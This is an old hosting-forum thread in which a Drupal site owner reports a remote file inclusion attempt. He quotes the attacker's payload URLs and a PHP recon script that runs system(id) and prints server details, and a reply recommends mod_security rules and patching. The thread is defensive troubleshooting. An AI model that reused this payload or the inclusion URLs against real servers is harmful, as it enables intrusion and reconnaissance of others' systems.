Portal Home > Knowledgebase > Articles Database > Hacking Attempt on site
Hacking Attempt on site
| Posted by gdtechind, 07-20-2008, 04:20 AM |
Hi Everyone,
I am having issue with my server. Someone is trying to execute some code and possibly trying mysql injection method.
I have pasted the code below.
Please suggest what can be done in this case.
Regards
Gagandeep
+++++++++++
The person tried to use different IPs and different websites to execute the code.
URL >> IP
http://www.teamfatalz.com/rfi/id.txt???? >> 62.112.193.46
http://www.larisco.com/id.txt?? >> 200.11.67.242
http://lei.crt-limousin.fr/ortl/lag/id.txt?? >> 78.111.68.37
ftp://212.11.127.86/tmp/trem/1? >> 87.118.118.156
There are many such queries under my logs.
The person is using different IPs, so, i can't even block that many IPs.
++++++++++++
The CODE
= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }
echo "Osirys
";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "0sirys was here ..
";
echo "uname -a: $un
";
echo "os: $os
";
echo "id: $id1
";
echo "free: $free
";
echo "used: $used
";
echo "total: $all
";
exit;
?>
|
| Posted by CodyRo, 07-20-2008, 04:30 AM |
| Is that the code that's being executed? If so it's basically telling him basic server info (space available, space used, machine name) and allowing him to execute system commands by using the system() PHP function.
It looks like a file inclusion exploit - which are fairly common. A simple mod_security rule should prevent them (beyond fixing the scripts themselves).
|
| Posted by gdtechind, 07-20-2008, 04:39 AM |
| Can you please tell a bit more about mod_security rule and how i can implement it.
The site is based on Drupal and i have already updated to latest versions after the recent security updates.
Thanks for a response.
|
| Posted by CodyRo, 07-20-2008, 04:47 AM |
| Here is something similar to what I use - if you want to focus on the inclusion attacks just ctrl+f "inclusion" - note that there are several of them.
|
| Posted by gdtechind, 07-20-2008, 04:52 AM |
| thanks again for help.
i am not sure what the person wants to achieve, but so far, he hasn't been able to get into the system.
|
| Posted by CodyRo, 07-20-2008, 04:59 AM |
| It's unlikely they will as long as everything is up to date.. there's a good chance its an old exploit some script kiddy is trying or even some sort of "security scanner".
Any who good luck !
|
Add to Favourites 
Print this Article
Also Read
EMAIL PROBLEM (Views: 489)
